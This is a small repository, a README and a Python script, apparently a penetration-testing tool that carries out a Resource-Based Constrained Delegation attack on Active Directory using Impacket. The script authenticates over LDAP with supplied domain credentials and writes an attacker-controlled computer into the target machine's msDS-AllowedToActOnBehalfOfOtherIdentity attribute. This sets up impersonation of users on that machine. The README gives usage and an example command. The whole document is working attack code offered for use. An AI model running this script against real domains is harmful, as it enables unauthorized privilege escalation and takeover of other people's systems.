├── README.md
└── rbcd.py


/README.md:
--------------------------------------------------------------------------------
 1 | # RBCD
 2 | 
 3 | Script written in python to perform Resource-Based Constrained Delegation (RBCD) attack by leveraging Impacket toolkit.
 4 | 
 5 | ## Usage
 6 | 
 7 | ```
 8 | usage: rbcd.py [-h] -u USERNAME -p PASSWORD -t COMPUTERNAME -f COMPUTERNAME HOSTNAME
 9 | 
10 | Resource-Based Constrained Delegation Attack: allow an attacker controllable (preferably previously created fake) computer for delegation on a target computer (where the attacker has write
11 | access to properties through LDAP)
12 | 
13 | Required options:
14 |   HOSTNAME              Hostname/ip or ldap://host:port connection string to connect to the AD
15 | 
16 | Main options:
17 |   -h, --help            show this help message and exit
18 |   -u USERNAME, --user USERNAME
19 |                         DOMAIN\username for authentication
20 |   -p PASSWORD, --password PASSWORD
21 |                         Password or LM:NTLM hash, will prompt if not specified
22 |   -t COMPUTERNAME       Target computer hostname where the attacker has write access to properties
23 |   -f COMPUTERNAME       (Fake) computer hostname which the attacker can control
24 | 
25 | Example: ./rbcd.py -host 10.10.10.1 -u domain\\user -p P@ssw0rd@123 -t WEB -f FAKECOMP
26 | ```
27 | 
28 | ## Blog
29 | 
30 | [Abusing Resource-Based Constrained Delegation (RBCD) using Linux](https://www.alteredsecurity.com/post/resource-based-constrained-delegation-rbcd)
31 | 
32 | ## Credit
33 | 
34 | This is a modified version of the [rbcd-attack](https://github.com/tothi/rbcd-attack) script which was initially developed by [an0n](https://twitter.com/an0n_r0). 


--------------------------------------------------------------------------------
/rbcd.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import argparse
 3 | import ldap3
 4 | import ldapdomaindump
 5 | from impacket import version
 6 | from impacket import logging
 7 | from impacket.examples import logger
 8 | from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack
 9 | from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
10 | 
11 | print(version.BANNER)
12 | 
13 | parser = argparse.ArgumentParser(add_help=True, description='Resource-Based Constrained Delegation Attack: allow an attacker controllable (preferably previously created fake) computer for delegation on a target computer (where the attacker has write access to properties through LDAP)')
14 | parser._optionals.title = "Main options"
15 | parser._positionals.title = "Required options"
16 | 
17 | #Main parameters
18 | maingroup = parser.add_argument_group("Main options")
19 | parser.add_argument("host", metavar='HOSTNAME', help="Hostname/ip or ldap://host:port connection string to connect to the AD")
20 | parser.add_argument("-u", "--user", required=True, metavar='USERNAME', help="DOMAIN\\username for authentication")
21 | parser.add_argument("-p", "--password", required=True, metavar='PASSWORD', help="Password or LM:NTLM hash, will prompt if not specified")
22 | parser.add_argument('-t', required=True, action='store', metavar='COMPUTERNAME', help='Target computer hostname where the attacker has write access to properties')
23 | parser.add_argument('-f', required=True, action='store', metavar='COMPUTERNAME', help='(Fake) computer hostname which the attacker can control')
24 | 
25 | if len(sys.argv) == 1:
26 |     parser.print_help()
27 |     print('\nExample: ./rbcd.py -host 10.10.10.1 -u domain\\\\user -p P@ssw0rd@123 -t WEB -f FAKECOMP')
28 |     sys.exit(1)
29 | 
30 | options = parser.parse_args()
31 | 
32 | c = NTLMRelayxConfig()
33 | c.addcomputer = options.f
34 | c.target = options.host
35 | 
36 | logger.init()
37 | logging.getLogger().setLevel(logging.INFO)
38 | logging.info('Starting Resource Based Constrained Delegation Attack against {}$'.format(options.t))
39 | 
40 | logging.info('Initializing LDAP connection to {}'.format(options.host))
41 | #tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2)
42 | serv = ldap3.Server(options.host, tls=False, get_info=ldap3.ALL)
43 | logging.info('Using {} account with password ***'.format(options.user))
44 | conn = ldap3.Connection(serv, user=options.user, password=options.password, authentication=ldap3.NTLM)
45 | conn.bind()
46 | logging.info('LDAP bind OK')
47 | 
48 | logging.info('Initializing domainDumper()')
49 | cnf = ldapdomaindump.domainDumpConfig()
50 | cnf.basepath = c.lootdir
51 | dd = ldapdomaindump.domainDumper(serv, conn, cnf)
52 | 
53 | logging.info('Initializing LDAPAttack()')
54 | la = LDAPAttack(c, conn, options.user.replace('\\', '/'))
55 | 
56 | logging.info('Writing SECURITY_DESCRIPTOR related to (fake) computer `{}` into msDS-AllowedToActOnBehalfOfOtherIdentity of target computer `{}`'.format(options.f, options.t))
57 | la.delegateAttack(options.f+'$', options.t+'$', dd, sid=None)
58 | 


--------------------------------------------------------------------------------